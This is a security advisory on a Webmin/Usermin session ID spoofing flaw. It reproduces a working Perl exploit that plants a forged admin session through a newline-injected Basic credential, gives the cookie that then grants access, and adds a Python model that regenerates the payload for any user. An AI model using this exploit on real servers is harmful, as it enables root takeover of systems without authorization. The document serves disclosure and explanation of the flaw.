26th Sep 2002 [SBWID-5340]
COMMAND
Webmin/Usermin Session ID Spoofing Vulnerability
SYSTEMS AFFECTED
Webmin Version: 0.960
Usermin Version: 0.90
Update (24 February 2003)
======
Webmin Version: 1.060
Usermin Version: 0.990
PROBLEM
Keigo Yamazaki of LAC Co., Ltd. [http://www.lac.co.jp/] found:
Webmin is a web-based system administration tool for Unix. Usermin is a
web interface that allows all users on a Unix system to easily receive
mails and to perform SSH and mail forwarding configuration.
Internal communication between the parent process and the child process
using named pipes occurs in these software packages during creation or
verification of a session ID, or during the setting process of password
timeouts. Because the control characters contained in the data passed
as authentication information are not eliminated, it is possible to
make Webmin and Usermin acknowledge the combination of any user and
session ID specified by an attacker. If the attacker could log into
Webmin by using this problem, there is a possibility that arbitrary
commands may be executed with root privileges.
[Preconditions for a successful exploit]
In the case of Webmin :
* Webmin->Configuration->Authentication
"Enable password timeouts" is enabled
* if a valid Webmin username is known
by default, user "admin" exists and this user can use all the
functions, including command shell
In the case of Usermin:
* if password timeout is enabled
* if a valid Usermin username is known
Update (24 February 2003)
======
In Secure Net Service (SNS) security advisory [[email protected]],
Computer Security Laboratory, LAC:
http://www.lac.co.jp/security/english/snsadv_e/62_e.html
Bug discovered by: Keigo Yamazaki, thanks to: Jamie Cameron
A vulnerability that could result in session ID spoofing exists in
miniserv.pl, the web server program on which both Webmin and Usermin
run.
Problem Description:
--------------------
Webmin is a web-based system administration tool for Unix. Usermin is a
web interface that allows all users on a Unix system to easily receive
mails and to perform SSH and mail forwarding configuration.
Miniserv.pl is the web server program on which both Webmin and Usermin
run. Miniserv.pl carries out named pipe communication between the
parent and the child process during, for example, the creation and
confirmation of a session ID (the session used for access control via
the Web) and during the password timeout process.
Miniserv.pl does not check whether metacharacters, such as line feed or
carriage return, are included in the BASE64-encoded string during the
BASIC authentication process. As a result, any user can log in as the
administrative user "admin" and spoof a session ID by using the pipe.
Exploitation therefore could make it possible for attackers to bypass
authentication and execute arbitrary commands as root.
[Preconditions for the exploit]
Webmin:
* Webmin -> Configuration -> Authentication and "Enable password
timeouts" is ON
* a valid Webmin username is known
Usermin:
* "Enable password timeouts" is ON
* a valid Webmin username is known
-Also-
Carl Livitt [[email protected]] says:
Attached is an exploit for the latest Webmin vulnerability. It relies
on a non-default setting (passdelay) being enabled.
Webmin can verify user authentication by use of a session ID (SID) that
is assigned when a user successfully authenticates to Webmin. It is
possible to inject a fake SID into the session ID database by using a
malicious username containing control sequences used internally by
Webmin.
This exploit simply creates a SID of 1234567890 for the user 'admin'.
Then, it is a simple case of creating a cookie in your favorite browser
containing:
sid=1234567890; testing=1
Such that the Cookie HTTP header contains:
Cookie: sid=1234567890; testing=1
When the webmin server receives this cookie, it is verified as an
authentic SID and an attacker can take complete control of the Webmin
server... this is basically root access to the box it is running on.
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
use strict;
use warnings;

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

# Path to netcat; adjust if your distribution installs it elsewhere.
my $nc = "/usr/bin/netcat";

if ($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}
my $hostname = $ARGV[0];

if (! -x $nc) {
    print "netcat not found!\n";
    exit(2);
}

# Pipe a single HTTP request to Webmin's default port (10000) and discard
# whatever the server sends back. The redirection is written in portable
# sh syntax; the original ">& /dev/null" is csh/bash-only and fails under
# a plain POSIX /bin/sh.
open(NC, "|$nc $hostname 10000 >/dev/null 2>&1")
    or die "cannot run $nc: $!\n";
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
# The Basic credential below decodes to:
#     "a a 1\nnew 1234567890 admin:password"
# The newline embedded in the username is passed through unfiltered to the
# parent/child named pipe, so the text after it is read as a separate
# "new 1234567890 admin" message, i.e. a fresh session record mapping
# SID 1234567890 to user 'admin'. The password itself never has to be right.
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
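The following is an added worked example, not part of the original advisory, the SNS advisory or Carl Livitt's exploit. It models in Python the flaw both write-ups above describe: the miniserv.pl child reports an authentication result to the parent over a named pipe as a newline-terminated, space-separated message with the username copied in unfiltered, and the parent keys on the first word of each line. The message names "delay" and "new" and their field order are assumptions made for this model (not miniserv.pl's own wire format); the user database, client IP and the hardened check are likewise constructed here. The Basic credential constant is the one from the exploit above, and the example shows both that `build_injected_credential` regenerates it for any SID/user pair and that rejecting control or whitespace characters in the username before it reaches the pipe closes the injection.

```python
import base64
import re

# Constant taken from the exploit on this page; everything else is constructed.
EXPLOIT_B64 = "YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ="
USERS = {"admin": "s3cret!"}   # constructed: the attacker does not know this


def decode_basic(b64cred):
    """Split an 'Authorization: Basic' value into (user, password)."""
    raw = base64.b64decode(b64cred).decode("latin-1")
    user, _, password = raw.partition(":")
    return user, password


def build_injected_credential(sid, target_user, password="password"):
    """Attacker side: a username that carries a newline plus a forged
    'new <sid> <user>' line. For sid=1234567890 and target_user='admin'
    this reproduces EXPLOIT_B64 exactly."""
    user = f"a a 1\nnew {sid} {target_user}"
    return base64.b64encode(f"{user}:{password}".encode("latin-1")).decode("ascii")


def username_is_clean(user):
    """Hardened check (assumed fix, not the vendor's patch): only printable,
    non-space ASCII may be interpolated into a pipe message."""
    return re.fullmatch(r"[\x21-\x7e]+", user) is not None


def child_report(user, ip, ok):
    """Vulnerable child side: the password-timeout report to the parent,
    with the username copied in verbatim (assumed message layout)."""
    return f"delay {user} {ip} {int(ok)}\n"


def parent_dispatch(pipe_data, sessions):
    """Parent side: read the pipe line by line and dispatch on the first
    word. A newline smuggled in the username becomes a second message."""
    seen = []
    for line in pipe_data.split("\n"):
        m = re.match(r"^new\s+(\S+)\s+(\S+)", line)
        if m:                                  # register sid -> user
            sessions[m.group(1)] = m.group(2)
            seen.append(("new", m.group(1), m.group(2)))
            continue
        m = re.match(r"^delay\s+(\S+)\s+(\S+)\s+(\d)", line)
        if m:
            seen.append(("delay", m.group(1), m.group(2), m.group(3)))
    return seen


def login_attempt(b64cred, client_ip, sessions, hardened):
    """Server side for one BASIC-auth request; returns the pipe messages
    the parent acted on. With hardened=True the bad username never
    reaches the pipe at all."""
    user, password = decode_basic(b64cred)
    if hardened and not username_is_clean(user):
        return []
    ok = USERS.get(user) == password           # the forged user never validates
    return parent_dispatch(child_report(user, client_ip, ok), sessions)


def sid_authenticates(sessions, sid, user):
    """What the later 'Cookie: sid=...' check amounts to."""
    return sessions.get(sid) == user


def cookie_header(sid):
    """The cookie the attacker sends once the SID has been planted."""
    return f"Cookie: sid={sid}; testing=1"


if __name__ == "__main__":
    vuln, hard = {}, {}
    print(login_attempt(EXPLOIT_B64, "203.0.113.5", vuln, hardened=False))
    print("vulnerable server accepts forged SID:",
          sid_authenticates(vuln, "1234567890", "admin"))
    print(login_attempt(EXPLOIT_B64, "203.0.113.5", hard, hardened=True))
    print("hardened server accepts forged SID:  ",
          sid_authenticates(hard, "1234567890", "admin"))
    print(cookie_header("1234567890"))
```

Note that the password in the injected credential is irrelevant: the `delay` line carries a failed result, yet the parent still honours the attacker's `new` line because it never ties the two lines together. That is why the fix belongs on the input side (reject control characters before building the message) rather than on the password check.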
SOLUTION
This problem can be eliminated by upgrading to Webmin version 0.970/
Usermin version 0.910, which are available at:
http://www.webmin.com/
Update (24 February 2003)
======
This problem can be eliminated by upgrading to Webmin version 1.070 and
Usermin version 1.000 available at:
http://www.webmin.com/